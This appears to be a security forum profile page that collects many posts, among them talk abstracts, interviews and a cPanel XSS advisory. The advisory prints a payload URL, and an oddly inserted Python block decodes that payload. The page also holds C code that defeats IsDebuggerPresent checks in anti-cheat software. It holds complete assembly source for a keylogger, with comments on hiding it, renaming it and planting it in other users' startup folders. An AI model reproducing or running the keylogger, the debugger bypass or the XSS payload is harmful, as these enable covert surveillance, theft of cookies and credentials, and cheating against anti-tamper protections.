Everything posted by Nytro
-
Because of some nasty login problems, I have gone back to saving the real IPs instead of random(). If you really don't want your IPs saved, you are perfectly capable of using Tor or something else. Maybe at the end of the year, or on the 1st, I will delete all the IPs from the DB again. Maybe we'll do this weekly. We'll see.
-
Building A Web Attacker Dashboard With Modsecurity And Beef

Description:

Abstract

The Browser Exploit Framework (BeEF) Project is extremely popular with application pentesters as it is a powerful tool for demonstrating the impacts of leveraging XSS vulnerabilities to achieve wider compromise into an organization. What if, however, we flipped the BeEF use-case around and instead put it in the hands of web application defenders? By using the open source ModSecurity WAF, we can dynamically hook web attackers with BeEF and monitor their activities and initiate various counter-measures.

*****

Speaker: Ryan Barnett, Lead Security Researcher, Trustwave SpiderLabs, Metro DC

Ryan C. Barnett is renowned in the web application security industry for his unique expertise. After a decade of experience defending government and commercial websites, Ryan joined Trustwave SpiderLabs Research Team. He specializes in application defense research and leads the open source ModSecurity web application firewall project. In addition to his commercial work at Trustwave, Ryan is also an active contributor to many community-based security projects. He serves as the Open Web Application Security Project (OWASP) ModSecurity Core Rule Set project leader and contributor on the OWASP Top Ten and AppSensor projects. He is a Web Application Security Consortium Board Member and leads the Web Hacking Incident Database and the Distributed Web Honeypot projects. At the SANS Institute, he is a certified instructor and contributor on the Top 20 Vulnerabilities and CWE/SANS Top 25 Most Dangerous Programming Errors projects. Ryan is regularly consulted by news outlets who are seeking his insights and analysis on emerging web application attacks, trends and defensive techniques. Ryan is a frequent speaker and trainer at key industry events including Blackhat, SANS AppSec Summit and OWASP AppSecUSA.

Ryan has authored two web security books with titles such as: "Preventing Web Attacks with Apache" from Pearson Publishing and the forthcoming "Web Application Defender's Cookbook: Battling Hackers and Protecting Users" from Wiley Brothers Publishing.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.

Original Source: Building a Web Attacker Dashboard with ModSecurity and BeEF - Ryan Barnett on Vimeo

Source: Building A Web Attacker Dashboard With Modsecurity And Beef
-
Top Ten Web Defenses

Description:

Abstract

We cannot hack or firewall our way secure. Application programmers need to learn to code in a secure fashion if we have any chance of providing organizations with proper defenses in the current threatscape. This talk will discuss the 10 most important security-centric computer programming techniques necessary to build low-risk web-based applications. The best security is contextual to each organization, application and feature. Real-world tradeoffs will be discussed in detail for each "control" and "control category" discussed.

*****

Speaker: Jim Manico, VP Security Architecture, WhiteHat Security

Jim Manico is the VP of Security Architecture for WhiteHat Security. He is the founder, producer and host of the OWASP Podcast Series, as well as the committee chair for the OWASP Connections Committee. He is the project manager of the OWASP Cheatsheet series, and a significant contributor to several other OWASP projects. Jim provides secure coding and developer awareness training for WhiteHat Security using his 8+ years of experience delivering developer-training courses for SANS, Aspect Secur…

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.

Original Source: Top Ten Web Defenses - Jim Manico on Vimeo

Source: Top Ten Web Defenses
-
C-Panel Cross Site Scripting

C-Panel suffers from a reflective cross site scripting vulnerability in manage.html.

CPanel Non Persistent XSS

Details
=============
Product: Cpanel
Security-Risk: High
Remote-Exploit: yes
Vendor-URL: http://www.cpanel.net
Advisory-Status: NotPublished

Credits
=============
Discovered by: Rafay Baloch of RafayHackingArticles(RHA)

Affected Products:
=============
Cpanel's Latest Version

Description
=============
"Simploo website management."

More Details
=============
I have discovered a non persistent Cross site scripting (XSS) inside Cpanel, the vulnerability can be easily exploited and can be used to steal cookies, perform phishing attacks and other various attacks compromising the security of a user.

Proof of Concept
=============
Log into your CPanel account and navigate to the following link:

https://localhost/frontend/x3/mail/manage.html?account=

Now insert your xss payload inside account parameter.

Exploit
=============
https://localhost/frontend/x3/mail/manage.html?account=%22%3E%3Cimg%20src=x%20onerror=prompt%28/XSSBYRAFAY/%29;%3E

Solution
=============
Edit the source code to ensure that input is properly sanitised.

Timeline
================

Use of terms
================

--
Warm Regards,
Rafay Baloch
http://rafayhackingarticles.net
http://techlotips.com

Source: C-Panel Cross Site Scripting ≈ Packet Storm
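
What the advisory's "Solution" means in practice, as an added example (it is not cPanel code and not part of the advisory): the HTML template that reflects `account`, and every function name, are assumptions made for illustration. The script decodes the advisory's PoC URL, renders the value with and without output encoding, and uses an HTML parser to check whether the value created new elements.

```python
"""Regression check for reflected input, using the advisory's PoC URL.

Assumption: manage.html reflects `account` inside a double-quoted attribute.
TEMPLATE is a constructed stand-in, not the real cPanel markup.
"""
import html
from collections import Counter
from html.parser import HTMLParser
from urllib.parse import unquote, urlsplit

# PoC URL exactly as printed in the advisory.
POC_URL = ("https://localhost/frontend/x3/mail/manage.html?account="
           "%22%3E%3Cimg%20src=x%20onerror=prompt%28/XSSBYRAFAY/%29;%3E")

# Hypothetical page fragment (constructed for this example).
TEMPLATE = '<form><input type="hidden" name="account" value="{account}"></form>'


def account_param(url):
    """Return the percent-decoded `account` query parameter."""
    for pair in urlsplit(url).query.split("&"):
        name, _, value = pair.partition("=")
        if name == "account":
            return unquote(value)
    return ""


def render_unsafe(account):
    """Reflects the value verbatim: the behaviour the advisory reports."""
    return TEMPLATE.format(account=account)


def render_encoded(account):
    """Encodes & < > " ' before placing the value in the attribute."""
    return TEMPLATE.format(account=html.escape(account, quote=True))


class TagCollector(HTMLParser):
    """Records every start tag and its attributes as a parser sees them."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parsed_tags(markup):
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


def injected_tags(render, value):
    """Tags present for `value` that a benign value does not produce."""
    baseline = Counter(t for t, _ in parsed_tags(render("user@example.com")))
    seen = Counter(t for t, _ in parsed_tags(render(value)))
    return sorted((seen - baseline).elements())


if __name__ == "__main__":
    payload = account_param(POC_URL)
    print("decoded parameter:", payload)
    print("unsafe  render adds:", injected_tags(render_unsafe, payload))
    print("encoded render adds:", injected_tags(render_encoded, payload))
```

The same `injected_tags` check can be run in a test suite against any template function that reflects request parameters; a non-empty result means the value escaped its context.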
-
Hook Analyser Malware Tool 2.2

Authored by Beenu Arora | Site hookanalyser.blogspot.com

Hook Analyser is a hook tool which can be potentially helpful in reversing applications and analysing malware. It can hook to an API in a process and search for a pattern in memory or dump the buffer.

Changes: The UI and modules of the project have been re-written. The interactive mode is now more verbose. The (static) malware analysis module has been enhanced. Bug fixes and other improvements.

Download: http://packetstormsecurity.org/files/download/119087/HookAnalyser2.2.zip

Source: Hook Analyser Malware Tool 2.2 ≈ Packet Storm
-
[h=1]Q&A: Interview with an IT Security Analyst[/h]
Tim Heard, December 24, 2012

(Rebecca Turner is an IT security analyst, employed by a leading global services provider. Rebecca began her career in IT as a helpdesk technician and has advanced through a number of roles. She has considerable experience as a field engineer, and also as a systems administrator.)

Q: I see from your background that you began your IT career working as a helpdesk technician. How did you get interested in IT security, and what led to you being in your current role?

A. I was an office manager for several years, and helped bring a small office into the computer age, just by reading and a few community college classes. I found that I really, really enjoyed PCs and figuring out how to set them up. I realized that I didn’t want to be a secretary the rest of my life, so I kept going in college and eventually landed a junior helpdesk role 13 years ago.

Q. What are the main duties of your current position?

A. I now work in IT Security. I scan PCs when they are infected, perform network and local vulnerability assessments, and handle patching and reporting.

Q. How well do you feel your training and education have prepared you for this position?

A. I think my early training (A+, Net+ and college) was very valuable in my technical role. It gave me a solid foundation to continue on with.

Q. What specific certifications have you earned?

A. A+, Net+, Novell CNE 6, Security+, CISSP.

Q. Looking back at your career, which of them have been the most helpful?

A. A+ and Net+ for the early years, Security+ and CISSP for my current position.

Q. Which of them, if any, have best prepared you for your current role, and why?

A. CISSP, as the study gave me a great overview of the security world.

Q. Are there certain certification programs which you feel, in retrospect, weren’t all that helpful in terms of preparing you for your career?

A. My Novell CNE. I only got it to get a new job. I really never used the information.

Q. If you could take additional coursework right now, or earn an additional certification, what would it be, and why?

A. CEH, SANS 504. I want to learn more about pen testing and ethical hacking.

Q. What are the main challenges someone faces as an IT security analyst that someone who is thinking of entering the field might not think about?

A. It’s very important to have a technical background when going into the security field. At least five years would be my recommendation.

Q. What advice would you give an IT generalist who is thinking of pursuing a career in IT Security?

A. Get your technical certs, like A+ and Net+. Make sure you have at least five years of good hands-on technical troubleshooting.

Q. What do you think are the prospects for this field in terms of job growth?

A. I think the prospects are great. I think the job growth is only going to go up.

Q. What changes do you expect to see in the coming years?

A. I HOPE that hiring managers learn the differences in the various certs and what they are used for. Why ask for a CISSP when you really need someone who just has a Security+? I expect to see more security generalist jobs, as companies try to cut costs. The more technical you are, the better path I think you’ll have since you’ll have the experience necessary to be that generalist. I also think we’re going to see many more compliance scanning jobs (PCI, HIPAA, SOX, etc), as more companies get into that kind of business.

Source: InfoSec Institute Resources – Q&A: Interview with an IT Security Analyst
-
Four Axes Of Evil

Description:

Abstract

This presentation focuses on large-scale internet vulnerability research from four unique perspectives, identifying patterns and exposing security issues that are difficult to identify using traditional approaches.

*****

Speaker: HD Moore, CSO, Rapid7

HD is Chief Security Officer at Rapid7 and Chief Architect of Metasploit, the leading open-source penetration testing platform. HD founded the Metasploit Project in the summer of 2003 with the goal of becoming a public resource for exploit code research and development.

*****

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.

Original Source: Four Axes of Evil - HD Moore on Vimeo

Source: Four Axes Of Evil
-
Bug Bounty Programs

Description:

Speakers

Michael Coates, Director of Security Assurance, Mozilla

Michael Coates is the Director of Security Assurance at Mozilla. He is responsible for Mozilla’s software and infrastructure security which includes Firefox, web applications, and critical infrastructure. In this role he sets the security assurance strategy to integrate security into the development lifecycle of all applications and ensures that the organization's infrastructure is designed to minimize risk and protect critical data. Michael is also the Chairman of the OWASP board, …

Chris Evans, Troublemaker, Google

Chris Evans is the author of vsftpd, a vulnerability researcher and for a paycheck, he built and now looks after the Google Chrome Security Team. Unruly bunch. Details of vsftpd are at security.appspot.com/vsftpd.html. His research includes vulnerabilities in all the major browsers (Firefox, Safari, Internet Explorer, Opera, Chrome); the Linux and OpenBSD kernels; Sun's JDK; and lots of open source packages. He blogs about some of his work at scarybeastsecurity.blogspot.c…

Jeremiah Grossman, CTO, WhiteHat Security

Jeremiah Grossman is the Founder and Chief Technology Officer of WhiteHat Security, where he is responsible for Web security R&D and industry outreach. Over the last decade, Mr. Grossman has written dozens of articles, white papers, and is a published author. His work has been featured in the Wall Street Journal, Forbes, NY Times and hundreds of other media outlets around the world. As a well-known security expert and industry veteran, Mr. Grossman has been a guest speaker on six con…

Adam Mein, Security Program Manager, Google

Some people like to find bugs; Adam likes to make sure they get fixed. He gets lots of opportunities to fulfill this (admittedly, sad) ambition as Manager of Google's Vulnerability Management team and Web Reward Program. Outside of work, Adam spends most of his time chasing around his 10 month old son and supporting his beloved Canberra Raiders rugby league team.

Alex Rice, Product Security, Facebook

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.

Original Source: Bug Bounty Programs - Michael Coates, Chris Evans, Jeremiah Grossman, Adam Mein, Alex Rice on Vimeo

Source: Bug Bounty Programs
-
[h=1]Hook (bypass) kernel32.dll IsDebuggerPresent[/h]
By: [h=3]try catch[/h]
I've found code that bypasses IsDebuggerPresent in an anti cheat, but I don't know how to use it. The code follows:

    #include <stdio.h>
    #include <stdlib.h>
    #include <windows.h>

    /* Clears the BeingDebugged byte in the PEB of the process described by pi
       (32-bit layout). Returns 1 on success, 0 on failure. */
    char KillIsDebuggerPresent(PROCESS_INFORMATION pi)
    {
        DWORD tib, pib;
        LDT_ENTRY segselector;
        CONTEXT TempContext;

        /* FS points at the thread's TIB; rebuild its linear base from the LDT entry. */
        TempContext.ContextFlags = CONTEXT_SEGMENTS;
        GetThreadContext(pi.hThread, &TempContext);
        GetThreadSelectorEntry(pi.hThread, TempContext.SegFs, &segselector);
        tib = ((segselector.HighWord.Bytes.BaseHi) << 24)
            + ((segselector.HighWord.Bytes.BaseMid) << 16)
            + (segselector.BaseLow);
        //printf("TIB @ %X\n", tib);

        /* TIB+0x30 holds the pointer to the process information block (PEB). */
        if (ReadProcessMemory(pi.hProcess, (void *)(tib + 0x30), &pib, sizeof(pib), NULL) == 0) {
            printf("Could not get PIB from TIB !\n");
            return 0;
        } else {
            char debug_info = 0xFF;
            // printf("PIB @ %X\n", pib);
            pib += 2;   /* offset 2 is the BeingDebugged byte read by IsDebuggerPresent */
            if (ReadProcessMemory(pi.hProcess, (void *)pib, &debug_info, sizeof(debug_info), NULL) == 0) {
                printf("Unable to read from PIB !\n");
                return 0;
            } else {
                // printf("Old debug value in PIB: %X\n", debug_info);
                if (debug_info != 0x01) {
                    printf("PB value unexpected. Aborting!");
                    return 0;
                } else {
                    debug_info = 0;
                    if (WriteProcessMemory(pi.hProcess, (void *)pib, &debug_info, sizeof(debug_info), NULL) == 0) {
                        printf("Could not write new value into PIB !\n");
                        return 0;
                    } else {
                        //printf("PIB debug value override ok!\n");
                        return 1;
                    }
                }
            } // debug info
        } // read pib
    } // read tib

    int main()
    {
        KillIsDebuggerPresent(...);   /* argument elided in the original post */
        return 0;
    }

Source: Hook (bypass) kernel32.dll IsDebuggerPresent - rohitab.com - Forums
-
[h=1]Basic key logger but very small[/h]
By: [h=3]drew77[/h]
This isn't fancy like some I have seen here, but it is less than 5000 bytes. I am interested in a keylogger that would save screenshots at adjustable intervals as well as typed input.

;******************************************************************************************* ; (BEST Viewed with NOTEPAD) ; CopyRight 2005, by ZOverLord at ZOverLords@Yahoo.com - ALL Rights Reserved ; ; "We Don't NEED no STINKIN DLL!"......ENJOY! vist http://testing.OnlyTheRightAnswers.com ; ; Proof Of Concept of using Low-Level Hooks without using any DLL for the Hook ; This Program is for Educational Proof Of Concept Use ONLY! ; ; This Program compiles in 4K, get it that's 4,096 Bytes. I got TIRED of all these folks ; who need a FAT program as well as a FAT DLL to create a Key-Logger so in frustration ; this proof of concept was created. Log Items include: ; ; Date-Time Stamps, Program Name, Window Title, Window Class, Domain Name, Computer Name ; User Name as well as the ability to be placed in StartUp Folders for ANY and/or ALL ; users. There is NOT any requirement for this to run as ADMIN, ANYONE can place it in ; the startup folder of any user, or for all users. ; ; The Logfile is named ZKeyLog.txt and seperate logs can be kept for seperate users this ; can be done automatically by simply placing the program in the: ; ; C:\Documents and Settings\All Users\Start Menu\Programs\Startup folder ; ; C:\Documents and Settings\?USER?\ folder as ZKeyLog.txt ; ("You can change the File to Hidden if needed") ; ; A Hot-Key of [CTRL]-[ALT]-[F11] will turn the Key-Logger Off ; ; There are two flavors one Raw ASM and one using INVOKES, Raw has more comments, low-level. 
; ; You can rename the EXE file to something NOT so obvious if needed, read the AReadMe.txt ; ;******************************************************************************************* .386 .model flat, stdcall option casemap:none include \masm32\include\windows.inc include \masm32\include\kernel32.inc include \masm32\include\user32.inc include \masm32\include\advapi32.inc include \masm32\include\msvcrt.inc include \masm32\macros\macros.asm includelib \masm32\lib\user32.lib includelib \masm32\lib\kernel32.lib includelib \masm32\lib\advapi32.lib includelib \masm32\lib\msvcrt.lib ;== Prototypes ================================================================= KeyBoardProc proto :DWORD, :WPARAM, :LPARAM ;== Prototypes ================================================================= pushz macro szText:VARARG local nexti call nexti db szText,00h nexti: endm .data CopyRight db "CopyRight 2005, ZOverLords@Yahoo.com" Vist db "http://testing.OnlyTheRightAnswers.com " hBuffer dd ? hComputerName db 32 dup(0) hCurrentThreadPiD dd 0 hCurrentWindow dd 0 hDateFormat db "dd MMM yyyy", 0 hDomaineName db 128 dup(0) hFile dd 0 hHook dd 0 hmodul MODULEENTRY32 <> hSnapShot dd 0 hTimeFormat db "hh:mm:ss tt", 0 hUserName db 32 dup(0) msg MSG <> onlyOneCopy db "Global\zkl",0 .code main: invoke CreateMutexA,0,0,ADDR onlyOneCopy invoke GetLastError ; check to make sure we are the only copy running call GetLastError ; for fast user switching we still support one cmp eax,ERROR_ALREADY_EXISTS ; copy per user, but if we are the second copy je more_than_one_copy ; trying to start, we exit xor ebx, ebx invoke RegisterHotKey, NULL, 0badfaceh, MOD_CONTROL or MOD_ALT, VK_F11 pushz "ab" ; append in binary mode pushz "ZKeyLog.txt" ; name of log file call fopen add esp, 2*4 ; all c lib functions need fixup.. 
;mov [hFile], eax ; save our file number mov hFile,eax invoke GetModuleHandleA, NULL invoke SetWindowsHookExA, WH_KEYBOARD_LL, ADDR KeyBoardProc, eax, ebx mov [hHook], eax ; ok here is our hook handle for later invoke GetMessageA, ADDR msg, NULL, NULL, NULL invoke UnhookWindowsHookEx, hHook invoke fclose, hFile more_than_one_copy: invoke ExitProcess, 0h ;############################################################## KeyBoardProc PROC nCode:DWORD, wParam:DWORD, lParam:DWORD LOCAL lpKeyState[256] :BYTE LOCAL lpClassName[64] :BYTE LOCAL lpCharBuf[32] :BYTE LOCAL lpDateBuf[12] :BYTE LOCAL lpTimeBuf[12] :BYTE LOCAL lpLocalTime :SYSTEMTIME ;---------------------------- lea edi, [lpKeyState] ; lets zero out our buffers push 256/4 pop ecx xor eax, eax rep stosd ; sets us up for doubleword from EAX mov eax, wParam cmp eax, WM_KEYUP ; only need WM_KEYDOWN je next_hook ; bypass double logging cmp eax, WM_SYSKEYUP ; only Need WM_SYSKEYDOWN je next_hook ; bypass double logging invoke GetForegroundWindow ; get handle for currently used window ( specific to NT ) cmp [hCurrentWindow], eax ; if its different to last one saved.. 
je no_window_change ; bypass all the headings mov [hCurrentWindow], eax ; save it for use now and compare later invoke GetClassName, hCurrentWindow, ADDR lpClassName, 64 invoke GetLocalTime, ADDR lpLocalTime invoke GetDateFormat, NULL, NULL, ADDR lpLocalTime, ADDR hDateFormat, ADDR lpDateBuf, 12 invoke GetTimeFormat, NULL, NULL, ADDR lpLocalTime, ADDR hTimeFormat, ADDR lpTimeBuf, 12 invoke GetWindowThreadProcessId, hCurrentWindow, ADDR hCurrentThreadPiD invoke CreateToolhelp32Snapshot, TH32CS_SNAPMODULE, hCurrentThreadPiD mov hSnapShot,eax mov hmodul.dwSize, sizeof MODULEENTRY32 invoke Module32First,hSnapShot,addr hmodul invoke CloseHandle,hSnapShot invoke GetWindowText, hCurrentWindow, ADDR lpKeyState, 256 lea esi, [hmodul.szExePath] ; print the current program exe name push esi lea esi, [lpTimeBuf] ; print the formatted time push esi lea esi, [lpDateBuf] ; print the formatted date push esi pushz 13,10,"[%s, %s - Program:%s]",13,10 push [hFile] call fprintf ; write the buffer to cache add esp, 3*4 lea esi, [lpClassName] ; print the current window class name push esi lea esi, [lpKeyState] ; print the current window title push esi pushz 13,10,"[ Window Title:%s - Window Class:%s]",13,10 push [hFile] call fprintf ; write the buffer to cache add esp, 3*4 mov hBuffer, 128 ; get the current domain name invoke GetComputerNameExA, 1, ADDR hDomaineName, ADDR hBuffer mov hBuffer, 32 ; get the current computer name invoke GetComputerNameExA, 0, ADDR hComputerName, ADDR hBuffer mov hBuffer, 32 ; get the current user name invoke GetUserName, ADDR hUserName, ADDR hBuffer lea esi, [hUserName] ; print the current user name push esi lea esi, [hComputerName] ; print the current computer name push esi lea esi, [hDomaineName] ; print the current domain name push esi pushz "[ Domain:%s - Computer:%s - User:%s]",13,10 push [hFile] call fprintf add esp, 3*4 invoke fflush, hFile no_window_change: mov esi, [lParam] ; we don't want to print shift or capslock names. 
lodsd ; it just makes the logs easier to read without them. cmp al, VK_LSHIFT ; they are tested later when distinguishing between je next_hook ; bypass left shift Key for upper/lowercase characters cmp al, VK_RSHIFT je next_hook ; bypass right shift Key cmp al, VK_CAPITAL je next_hook ; bypass caps lock Key cmp al, VK_ESCAPE je get_name_of_key ; we Want escape characters cmp al, VK_BACK je get_name_of_key ; we want backspace key cmp al, VK_TAB je get_name_of_key ; we want tab key ;------------------ lea edi, [lpCharBuf] ; zero initialise buffer for key text push 32/4 pop ecx xor eax, eax rep stosd ;---------- lea ebx, [lpKeyState] push ebx call GetKeyboardState ; get current keyboard state invoke GetKeyState, VK_LSHIFT xchg esi, eax ; save result in esi invoke GetKeyState, VK_RSHIFT or eax, esi ; al == 1 if either key is DOWN mov byte ptr [ebx + 16], al ; toggle a shift key to on/off invoke GetKeyState, VK_CAPITAL mov byte ptr [ebx + 20], al ; toggle caps lock to on/off mov esi, [lParam] lea edi, [lpCharBuf] push 00h push edi ; buffer for ascii characters push ebx ; keyboard state lodsd xchg eax, edx lodsd push eax ; hardware scan code push edx ; virutal key code call ToAscii ; convert to human readable characters test eax, eax ; if return zero, continue jnz test_carriage_return ; else, write to file. get_name_of_key: ; no need for large table of pointers to get asciiz mov esi, [lParam] lodsd ; skip virtual key code lodsd ; eax = scancode shl eax, 16 xchg eax, ecx lodsd ; extended key info shl eax, 24 or ecx, eax push 32 lea edi, [lpCharBuf] push edi push ecx call GetKeyNameTextA ; get the key text push edi pushz "[%s]" jmp write_to_file test_carriage_return: push edi pushz "%s" cmp byte ptr [edi], 0dh ; carriage return? jne write_to_file mov byte ptr [edi + 1], 0ah ; add linefeed, so logs are easier to read. 
write_to_file: invoke fprintf, hFile next_hook: invoke CallNextHookEx, hHook, nCode, wParam, lParam ret KeyBoardProc ENDP end main

hFile dd 0
invoke fclose, hFile

C:\masm32\SOURCE\Log.asm(110) : error A2148: invalid symbol type in expression : fclose

Source: Basic key logger but very small - rohitab.com - Forums
-
Interview with Kaspersky Chief Malware Expert Alex Gostev

December 24, 2012, 11:50AM by Michael Mimoso

The last year has seen a lot of changes in the threat landscape, with the emergence of a number of new cyber espionage tools such as Gauss and Flame, as well as an increase in the volume of malware targeting mobile platforms such as Android. Recently, Alex Gostev, the chief malware expert at Kaspersky Lab, answered questions submitted by users on Facebook, discussing the evolution of antimalware solutions, the threats to mobile devices and how governments around the world are handling the cybercrime explosion.

Hi Alex, I would like to ask about cyber spying. You know, we make a lot of overseas calls via Skype in business today. Is there a wiretapping risk with Skype calls?

Alex Gostev: If the computer of the Skype user is infected with a malicious program capable of recording voice traffic (or intercepting data from a microphone), then, naturally, any voice communication via Skype can be intercepted. This is not just a theoretical possibility; incidents like this have in fact taken place repeatedly, and have even involved software created by law enforcement agencies. For example, an incident of this kind took place in Germany last year.

Are governments around the world coping with cybercrimes or just studying it?

Alex Gostev: The main problem with fighting cybercrime today is its global character. Undoubtedly, many countries in the world have achieved notable success in combating this threat; however, the most serious crimes can only be investigated successfully if there is international cooperation. Unfortunately, this is an area where problems do exist: a number of countries, for one reason or another, are not involved in international initiatives to fight cybercrime.

How did you manage to become who you are? Where did you get all that knowledge?
Alex Gostev: That’s a tough one J It was back in 1994 when I came across my first computer viruses; I only joined Kaspersky Lab in 2002. So you could say I gained most of my knowledge about viruses on my own. Take my word for it: there is sufficient information available on the Internet both to learn to analyze malicious programs and to understand the current trends in cybercrime and threat evolution. So, I suggest you read as many sites and expert blogs as you can, and try to reproduce their findings on your own; try to understand how the experts came to the conclusions they write about. Kaspersky Lab has three expert blogs: Securelist, Threatpost and our new consumer blog. Why is it that virus makers mostly target the Windows operating system? Alex Gostev: The answer is simple: over 90% of users are on Windows. There is a similar situation when it comes to mobile platforms: Android leads the pack both in terms of users and malware. They say that it’s cyber war out there. Has Kaspersky been attacked? Alex Gostev: Just like any other company involved in information security, Kaspersky Lab is a frequent target for attacks. This is to be expected. And, of course, we use the most reliable technologies to protect us from such attacks. I want to work for Kapersky’s GReAT team. What would be the best college to finish and courses to take? Alex Gostev: A technical education is important. There’s no one college or set of courses that’s the best to become a security researcher, but a good knowledge of operating systems, programming languages and a willingness to work hard are essential. How many threats are added to Kaspersky databases daily to provide effective protection to everyone? What’s the comparison to free antivirus solutions? Alex Gostev: At the present time, we detect some 200,000 new malicious programs every day. Naturally, it takes serious resources – both human and technical – to collect and process such huge volumes of threats. 
Besides malicious files, there are also other types of threats including malicious sites, network attacks, exploits etc. that we also need to keep tabs on. All this requires an extensive financial outlay. Independent testing shows that we have an edge over freeware security tools. With nations increasingly using harmful software on their enemies what do you think about this? What’s Kaspersky’s stance on this? Has Kaspersky been approached by governments? What do you foresee for the future of industrial/governmental cyber wafrare. What’s Kaspersky’s future in this? Alex Gostev: That’s a difficult question that really merits a separate article. In a nutshell, our first, major priority is to protect our users. So we will protect them from all types of malicious programs regardless of who creates them. It is also our aim to communicate a simple message to the world’s governments: any malware can also be used against its creators; unintended targets can also become victims. Cybercrime must become subject to international law and must come under the regulations and monitoring of the global community. Anything to protect us from our own government? Alex Gostev: We protect against malicious programs without making any distinctions as to who created them. I know that Windows phone is not considered a virus target, but for those of us who want more security for our phone and feel left out, why is it so hard to make virus protection for Windows Phones? Alex Gostev: There are no problems whatsoever about creating antivirus protection for Windows Phone (at least, Kaspersky Lab does not have any problems doing it). Why do people say Apple computers don’t get viruses when they actually get more than people think? Alex Gostev: These are old stereotypes that were created primarily by Apple themselves. Apple have claimed for a long time that their computers are much better protected. 
Eventually, they admitted that malware does exist for Apple computers and even incorporated a primitive antivirus scanner into OS X. Microsoft, for instance, also had to spend a decade or so learning to take virus threats seriously. Apple is only taking its first steps along this road, but we think they are moving in the right direction, especially if you look at the protection system on the iPhone. Alex, what’s the best way of preventing your computer being infected and locked and asked to pay a steep fee to unlock it? Alex Gostev: In the overwhelming majority of cases involving extortion malware, or ransomware, the victim computer is infected via a web browser. This is usually down to vulnerabilities in Java, Adobe Flash or in the browsers themselves. All these vulnerabilities have long been known and patched by the vendors. So, your first step should be to install all the latest patches and updates for your software on a regular basis. What are the main Android threats? Kaspersky Security Bulletin 2012. Malware Evolution - Securelist See point 3 (“The explosion of Android threats”) and item 10 (“Mobile malware”) in this security bulletin. Why does Kaspersky often (maybe very often) recognize “good” software as malicious? Alex Gostev: I have to disagree with you on this one. Kaspersky Lab’s products have one of the lowest false positive rates in the entire industry; independent test results back up this claim. We couldn’t possibly have received the “Product of the year” award unless we had demonstrated the fewest false positives in dedicated testing. Which web browser do you prefer? Which one is more secure? Which one is the best solution for Kaspersky products? Alex Gostev: At the current time, I prefer Google Chrome. Which browser is the safest? Well, the answer to that is changing all the time. The situation can change in an instant – the discovery of a 0-day vulnerability would immediately turn the safest browser into the most vulnerable one. 
Therefore, apart from keeping an eye on the browser vulnerability situation, it is also advisable to complement your browser with dedicated protection tools, such as a sandbox, whitelisting etc. All these things are implemented in Kaspersky Lab’s products. What are the most ”fashionable” viruses today? What was the most unusual virus detected last year? Alex Gostev: Depends what you mean by “fashionable”. If we’re talking about high-profile malware, it would primarily be a whole new generation of malware in the Middle East which includes Flame, Duqu, Gauss, miniFlame, Wiper. All these kept us fairly busy throughout the year, both in terms of searching for and analyzing the findings. The realm of cyber weapons, i.e. malware created at the state level to attack the citizens, companies and authorities of other countries, is probably the hottest and most interesting topic right now. As for unusual malware, there were traits in every single program mentioned above that we thought (and still think) were unusual. For instance, one of the Gauss modules installs a modified proprietary font called Palida Narrow into the system. Why it does this remains a mystery. Another example is the propagation module incorporated into the Flame worm –it helps the worm spread via local area networks, and that is a whole other story. Its creators have not only successfully implemented an unprecedented MD5 cryptographic attack but have also created a “real” Microsoft certificate. This is way beyond a 0-day vulnerability – this is “god mode”. Nothing like this has occurred before. Is being a virus analyst a difficult job? Alex Gostev: It’s only difficult for the first few years. After that, once you’ve gained experience, it gets easier. I remember about six years ago we organized competitions in our Virus Lab to see who could analyze malware the fastest. The record was 43 seconds from a file arriving for analysis till a detection was added. 
On the other hand, virus analysis is only a small part of the job. You have to be well informed about all developments, including news from your competitors and news from the other side of the front line; you need to be aware of where it’s all going and what will happen tomorrow. I suppose, this is the most difficult part, and it’s getting more difficult every day.

What new types of malware does the near future have in store for us?
Alex Gostev: There are unlikely to be any new types of malware. All the generic types of malware behavior have long been identified and malware, including viruses, worms, Trojans and exploits, are evolving along those lines. Of course, dozens of subtypes exist within each category, such as Trojan cryptographers, banking Trojans, network worms etc. However, malware evolution takes place exclusively in terms of seizing new platforms or operating systems – mobile Trojans are a vivid example. From the point of view of technology, everything is the same, but with new platforms and new possibilities, such as the sending of SMS text messages. Therefore, we expect all the conventional types of threats to migrate in the near future from personal computers to the entire range of modern devices.

Alex, do you keep a diary for yourself? E.g. I came across such and such a malicious program today. I was able to treat it in such and such a way. Tried such and such a dish and liked it. The weather was nice, etc.
Alex Gostev: No, I simply don’t have time for that. Time and again I think that it might be worthwhile writing down how my research is going. I think it would make a pretty interesting book. On the other hand, many of the things we’re involved in and the things we’re aware of cannot be published (yet).

Which operating system do you use? Which do you think is the safest for desktops?
Alex Gostev: I am not a dedicated fan of any specific operating system; in fact, I have a very simple view on them: for every task, there exists a suitable operating system. I arrange my work accordingly. In a single day I can work under Windows, OS X and Linux, not to mention mobile platforms for phones and tablet PCs. There are no secure desktop operating systems. Any operating system can only be called secure on a conditional basis until the next 0-day vulnerability emerges. When this happens, it instantly turns the safest operating system into the most vulnerable one. I’m talking here about a situation where the vulnerability is publicly disclosed. As for privately-known vulnerabilities, well they always exist for any given operating system.

How much of his work time does a senior virus analyst put into practical, hands-on work, such as reverse engineering, debugging and sandboxing?
Alex Gostev: It depends on the time of the year and the research project the team is working on at a specific time. Sometimes, I can spend 80% of the day on hands-on research of a specific piece of malware. That may last for, say, a week. Sometimes I don’t touch a single malware file for an entire day. If you look at the bigger picture, I’d say I spend no more than 20% of my time throughout the year on hands-on research. However, when I was a virus analyst processing the inbound malware traffic, it took up 100% of my time. Now, I have to do a lot of non-core activities, such as giving answers to your questions.

What make of smartphone or telephone does Alexander use (which manufacturer, model)? Does he have a mobile security solution installed on it?
Alex Gostev: At the moment I have an iPhone 3. It is a corporate phone. I don’t have any antivirus on it, because: a) no antivirus solution exists for iPhones; b) it has not been jailbroken; c) there are no viruses for non-jailbroken iPhones anyway.
